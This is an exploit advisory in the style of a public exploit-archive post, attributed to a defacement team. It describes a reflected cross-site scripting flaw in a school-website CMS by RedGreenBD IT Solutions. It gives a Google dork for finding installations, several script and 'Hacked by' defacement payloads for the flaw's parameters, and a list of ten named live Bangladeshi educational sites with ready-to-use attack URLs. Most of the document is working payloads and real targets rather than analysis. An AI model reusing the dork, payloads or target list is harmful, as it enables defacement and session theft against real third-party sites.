RedGreenBD IT Solutions XSS Reflected Cross Site Scripting

1. ###################################################################
2.  
3. # Exploit Title : RedGreenBD IT Solutions XSS Reflected Cross Site Scripting
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/06/2019
7. # Vendor Homepage : redgreenbd.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
12. # Google Dorks : intext:Design & Developed by : RedGreenBD IT Solutions site:edu.bd
13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
16. # Reference Link : cxsecurity.com/ascii/WLB-2019010038
17. # Reference Link 2 : cxsecurity.com/issue/WLB-2019060023
18.  
19. ###################################################################
20.  
21. Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) :
22. *********************************************************
23. The server reads data directly from the HTTP request and reflects it back in the
24. HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply
25. dangerous content to a vulnerable web application, which is then reflected back to the victim
26. and executed by the web browser. The most common mechanism for delivering malicious
27. content is to include it as a parameter in a URL that is posted publicly or e-mailed directly
28. to the victim. URLs constructed in this manner constitute the core of many phishing
29. schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site.
30. After the site reflects the attacker's content back to the victim,the content is
31. executed by the victim's browser. A successful exploit could allow the attacker
32. to execute arbitrary script code in the context of the affected site
33. and allow the attacker to access sensitive browser-based information.
34. An attacker, for example,can exploit this vulnerability to steal cookies from
35. the attacked user in order to hijack a session and gain access to the device.
36.  
37. ###################################################################
38.  
39. # Reflected Cross Site Scripting XSS Exploits and Payloads :
40. *******************************************************
41. /?q=newsDetail&id=1%27<!--\x3E<img%20src=www.cxsecurity.com/%20onerror=javascript:alert(1)>%20-->
42.  
43. /?q=newsDetail&id=1%27<!--\x3E<img%20src=cert.cx/cxstatic/images/0br0/glN.png%20onerror=javascript:alert(1)>%20-->
44.  
45. /?q=newsDetail&id=1%27<script>alert(/KingSkrupellos/);</script>
46.  
47. /?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
48.  
49. /?q=news-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
50.  
51. /?q=notice-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
52.  
53. /?q=page-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
54.  
55. /?q=home-block&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
56.  
57. /index.php?q=news-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
58.  
59. /?q=routine&class=4&section=5&rtype=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
60.  
61. ###################################################################
62.  
63. # Example Vulnerable Sites :
64. *************************
65. [+] cppi.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
66.  
67. [+] bsidhaka.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
68.  
69. [+] nipi.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
70.  
71. [+] tsbghs.edu.bd/?q=page-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
72.  
73. [+] pakhimarapvss.edu.bd/?q=notice-detail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
74.  
75. [+] rmss.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
76.  
77. [+] ths.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
78.  
79. [+] panchjuniadss.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
80.  
81. [+] dhankhalimuss.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
82.  
83. [+] cmpi.edu.bd/?q=newsDetail&id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
84.  
85. ###################################################################
86.  
87. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
88.  
89. ###################################################################